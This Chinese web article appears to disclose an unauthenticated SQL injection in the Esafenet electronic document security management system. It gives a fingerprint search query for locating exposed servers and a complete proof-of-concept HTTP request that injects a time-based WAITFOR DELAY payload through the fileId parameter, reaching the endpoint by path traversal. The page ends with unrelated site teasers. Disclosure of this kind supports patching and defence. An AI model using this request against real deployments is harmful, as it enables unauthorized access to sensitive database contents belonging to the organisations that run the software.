SQL注入漏洞

漏洞信息

由于亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA处fileID对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,未授权的攻击者可获取数据库敏感信息。
图片

漏洞信息

漏洞复现

复现信息

语法:

app='亿赛通-电子文档安全管理系统'
图片

测绘搜索

POC:

POST /CDGServer3/js/../SaveCDGPermissionFromGFOA HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 39Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded
fileId=1';WAITFOR DELAY '0:0:2'--&pis=1
漏洞复现

复现信息

图片

复现-1

图片

复现-2

更多内容

发现更多

图片

原创文章,作者:guozi,如若转载,请注明出处:https://www.sudun.com/ask/90243.html

Like (0)
guozi的头像guozi
Previous 2024年6月5日
Next 2024年6月5日

相关推荐

  • 如何利用网站流量查看工具提高网站的访问量?

    你是否曾经苦恼于网站的访问量低迷?想要提高网站的流量却不知道从何下手?别担心,今天我们就来为你解决这个问题。如何利用网站流量查看工具提高网站的访问量?这个问题或许曾经困扰过你,但是…

    行业资讯 2024年3月19日
    0
  • win10电脑自动关机命令(详解)

    win10电脑自动关机命令,或许是你在使用电脑时最常遇到的一个问题。当你正专心处理重要的工作时,突然电脑自动关机,让你不得不中断工作进程。那么什么是win10电脑自动关机命令?它又…

    行业资讯 2024年4月5日
    0
  • ip6s

    网络安全加速行业,这个看似陌生的名词,却是当今互联网时代中不可或缺的一部分。它究竟是什么?它又有什么作用?或许你还不太了解,但是它却已经悄然影响着我们的日常生活。今天,让我们一起来…

    行业资讯 2024年3月29日
    0
  • 如何查看网站的被访问量,如何知道网站流量

    网站流量监控是每个网站站长都需要关注的问题。随着互联网的发展,越来越多的网站受到攻击,如何检测并及时解决这些攻击已成为一个紧迫的问题。本文介绍了网站流量监控的重要性和作用,并解释了…

    行业资讯 2024年5月9日
    0

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注